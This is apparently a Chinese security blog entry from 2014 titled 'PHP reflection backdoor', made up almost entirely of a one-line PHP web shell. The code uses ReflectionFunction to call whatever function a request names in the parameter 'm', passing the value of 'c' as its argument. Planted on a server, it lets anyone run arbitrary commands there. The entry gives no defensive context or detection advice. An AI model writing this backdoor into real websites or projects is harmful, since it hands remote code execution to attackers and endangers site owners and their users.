PHP反射后门 Nov 07,2014 in Web,安全研究 lang 繁 read (4530) <?php $func = new ReflectionFunction($_GET[m]); echo $func->invokeArgs(array($_GET[c])); ?>